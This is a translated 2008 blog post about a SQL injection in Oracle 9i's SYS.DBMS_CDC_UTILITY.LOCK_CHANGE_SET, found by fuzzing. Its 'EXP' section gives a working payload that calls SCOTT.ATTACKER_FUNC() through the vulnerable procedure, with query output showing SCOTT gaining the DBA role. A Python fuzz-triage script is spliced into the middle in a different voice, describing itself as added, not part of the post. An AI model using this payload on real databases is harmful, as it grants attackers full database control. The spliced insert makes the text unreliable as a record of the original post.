2008-05-02

    SQL Injection in SYS.DBMS_CDC_UTILITY.LOCK_CHANGE_SET

    Copyright notice: when reposting, please cite the original source and author information, together with this notice, as a hyperlink.
    http://superhei.blogbus.com/logs/20127819.html

    Oracle Database SQL Injection in SYS.DBMS_CDC_UTILITY.LOCK_CHANGE_SET

    http://www.appsecinc.com/resources/alerts/oracle/2008-01.shtml

    [Test version: Oracle9i Enterprise Edition Release 9.0.1.1.1 - Production]

    At first I didn't read the title carefully, so I started by running orafuzz (which 木瓜 wrote for me) against it; when it got to LOCK_CHANGE_SET, this came out:

    Build Querys = 1
     
    [RUNNING]  0
    [ERROR]---------------------------------------------------------------------------------------------
    29532
    declare
    CHANGE_SET_NAME VARCHAR2(100);
    begin
    CHANGE_SET_NAME:='TEST25647 ';
    SYS.DBMS_CDC_UTILITY.LOCK_CHANGE_SET('''');end;
    ORA-29532: Java call terminated by uncaught Java exception: oracle.jdbc.driver.OracleSQLException: ORA-06550: line 1, column 97:
    PLS-00103: Encountered the symbol "');end;" when expecting one of the following:

       ( - + case mod not null <an identifier>
       <a double-quoted delimited-identifier> <a bind variable> avg
       count current exists max min prior sql stddev sum variance
       execute forall merge time timestamp interval date
       <a string literal with character set specification>
       <a number> <a single-quoted SQL string> pipe
    ORA-06512: at "SYS.DBMS_CDC_UTILITY", line 74
    ORA-06512: at line 5
    --------------------------------------------------------------------------------------------------

    So it looks like a SQL injection nested inside a Java call.
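    Triage for the kind of fuzz output shown above, as an added example that is not code from this post or from orafuzz: it pulls the called procedure and the raw argument out of the error block and applies the post's reasoning, flagging a parser error raised inside the callee for a quote-bearing input as suspected run-time statement building, with the ORA-29532 wrapper recorded separately as "the statement lives in Java". Both log blocks are constructed from the output above, SYS.SOME_PKG.SOME_PROC is a hypothetical package used for the non-suspect case, and the set of parser-level error codes is an assumption of mine.

```python
import re

# Constructed sample: the core lines of the orafuzz error block quoted in the post.
SAMPLE_INJECTABLE = """\
begin
SYS.DBMS_CDC_UTILITY.LOCK_CHANGE_SET('''');end;
ORA-29532: Java call terminated by uncaught Java exception: oracle.jdbc.driver.OracleSQLException: ORA-06550: line 1, column 97:
PLS-00103: Encountered the symbol "');end;" when expecting one of the following:
ORA-06512: at "SYS.DBMS_CDC_UTILITY", line 74
ORA-06512: at line 2
"""

# Constructed counter-example with a hypothetical package: the quote is rejected
# as a *value*, which is how a callee that binds its argument fails.
SAMPLE_BENIGN = """\
begin
SYS.SOME_PKG.SOME_PROC('''');end;
ORA-06502: PL/SQL: numeric or value error: character string buffer too small
ORA-06512: at "SYS.SOME_PKG", line 12
ORA-06512: at line 2
"""

CALL_RE = re.compile(r"^\s*([A-Z0-9_$#]+(?:\.[A-Z0-9_$#]+)+)\((.*)\);\s*end;", re.M)
CODE_RE = re.compile(r"\b((?:ORA|PLS)-\d{5})\b")
AT_RE = re.compile(r'ORA-06512: at "([^"]+)", line (\d+)')
# Parser-level errors (assumed set): only a statement parsed at run time raises these.
PARSE_ERRORS = {"ORA-06550", "PLS-00103", "ORA-01756", "ORA-00933"}


def triage(block: str) -> dict:
    """Classify one fuzz error block the way the post reasons: the anonymous block
    itself compiled, so a parser error raised *inside* the callee for an input that
    carried a quote means the input was spliced into a second statement built at
    run time (concatenated, not bound). ORA-29532 only says that code is Java."""
    m = CALL_RE.search(block)
    raw = m.group(2).strip() if m else ""
    # '''' as typed in the call is the single character ' once PL/SQL unescapes it.
    arg = raw[1:-1].replace("''", "'") if len(raw) > 1 and raw[0] == raw[-1] == "'" else raw
    codes = CODE_RE.findall(block)
    at = AT_RE.search(block)
    return {
        "procedure": m.group(1) if m else None,
        "argument": arg,
        "codes": codes,
        "failing_unit": (at.group(1), int(at.group(2))) if at else None,
        "via_java": "ORA-29532" in codes,
        "suspect_dynamic_sql": "'" in arg and bool(PARSE_ERRORS & set(codes)),
    }
```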

    EXP:

    SQL> SELECT  GRANTEE FROM DBA_ROLE_PRIVS WHERE GRANTED_ROLE='DBA';

    GRANTEE
    ------------------------------
    CTXSYS
    SYS
    SYSTEM
    WKSYS

    SQL> exec SYS.DBMS_CDC_UTILITY.LOCK_CHANGE_SET('''||SCOTT.ATTACKER_FUNC()||''');

    PL/SQL 过程已成功完成。

    SQL> SELECT  GRANTEE FROM DBA_ROLE_PRIVS WHERE GRANTED_ROLE='DBA';

    GRANTEE
    ------------------------------
    CTXSYS
    SCOTT
    SYS
    SYSTEM
    WKSYS

    By default, this DBMS_CDC_UTILITY requires: "By default, users granted SELECT_CATALOG_ROLE have the required privilege". Still, the exciting part is that this proves our orafuzz really is effective to some degree .....

    [Thanks to 木瓜, kj and the other brothers in the hi group]

    Comments

  • Do you have an Oracle environment patched with CPUApr2008? If so, help me test something; you can contact me by email at alert7 [at] gmail.com
  • Bump bump bump!!!
